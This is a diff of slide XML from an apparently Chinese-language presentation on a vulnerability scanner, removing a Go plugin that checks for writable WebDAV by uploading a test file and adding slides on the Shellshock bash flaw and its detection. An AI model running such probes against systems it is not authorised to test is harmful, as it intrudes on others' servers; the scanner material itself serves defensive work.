+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72084524-DB0D-144A-8471-B96E4A90F314}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -8586,8 +7519,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1791222" y="0"/>
-            <a:ext cx="8154444" cy="6278257"/>
+            <a:off x="913774" y="1315234"/>
+            <a:ext cx="9745876" cy="1938992"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -8600,559 +7533,195 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPts val="1340"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>func</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> (d *</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>webDav</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) Check(URL string, meta </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>plugin.TaskMeta</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>) bool {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(URL)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>putURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> := URL + "/" + </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.GetRandomString</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(6) + ".txt"</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   request, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>http.NewRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("PUT", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>putURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>strings.NewReader</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vultest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>"))</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   _, err = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.RequestDo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(request, false, 15)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>http.NewRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>("GET", </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>putURL</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, nil)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   resp, err := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>util.RequestDo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vRequest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, true, 15)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if err != nil {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>fmt.Println</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>err.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>())</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>log.Error</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(err)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   if </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>strings.Contains</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, "</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>vultest</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>") {</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      result := </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.info</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Response</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>resp.ResponseRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>result.Request</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>resp.RequestRaw</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> = append(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>d.result</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>, result)</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>      return true</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   }</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>   return false</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>}</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>2014</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>年</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>9</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>月</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>24</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>日，一位名叫斯特凡</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>·</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>沙泽拉的安全研究者发现了一个名为“破壳”（</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>Shellshock</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
+              <a:t>，</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>也称为“</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>门”或“</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>Bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>漏洞”）的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>漏洞。该漏洞如果被渗透，远程攻击者就可以在调用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>shell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>前通过在特别精心编制的环境中输出函数定义执行任何程序代码。然后，这些函数内的代码就可以在调用</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
+              <a:t>bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+              <a:t>时立即执行。</a:t>
+            </a:r>
+            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="文本框 7">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15046D8D-F7C3-0D47-86D4-39F94A85EFEE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913774" y="3594970"/>
+            <a:ext cx="9745876" cy="1384995"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square" rtlCol="0">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>来自</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>CVSS</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>的评分：破壳漏洞的严重性被定义为</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>10</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>级（最高），今年</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>4</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>月爆发的</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>OpenSSL“</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>心脏出血”漏洞才</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>5</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>级！</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>破壳漏洞存在有</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>25</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>年，和</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2800" dirty="0"/>
+              <a:t>Bash</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
+              <a:t>年龄一样。</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2994534069"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4030492480"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -9184,7 +7753,7 @@
           <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FE0BDB-C419-7247-93CF-C74DF4D7491C}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E3877A-22AC-EC40-A0A9-2F550024B2D2}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -9197,19 +7766,17 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="913775" y="618518"/>
-            <a:ext cx="10364452" cy="583982"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="90000"/>
-          </a:bodyPr>
+            <a:off x="913775" y="0"/>
+            <a:ext cx="9307463" cy="809450"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
             <a:r>
               <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>插件化</a:t>
+              <a:t>破壳漏洞检测思路</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -9219,7 +7786,7 @@
           <p:cNvPr id="4" name="文本框 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40B0B526-043D-2B47-A559-25A0442DBE05}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F77767-A903-884B-9C15-F1309F8D0B89}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -9228,8 +7795,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="1816274" y="1490597"/>
-            <a:ext cx="8880953" cy="5078313"/>
+            <a:off x="413359" y="809450"/>
+            <a:ext cx="11448789" cy="1569660"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -9243,222 +7810,73 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>e-defender</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>和一个比较核心的特性就是插件化，可以支持平滑的拓展，如果有新的功能想要加入，只需要在</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>plugin/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>goPlugins</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>中添加相关函数即可，新添加的这个对象只要实现了如下接口，就是一个可用的插件</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>// </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
-              <a:t>GoPlugin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>插件接口</a:t>
-            </a:r>
-            <a:br>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
-              <a:t>type </a:t>
-            </a:r>
-            <a:r>
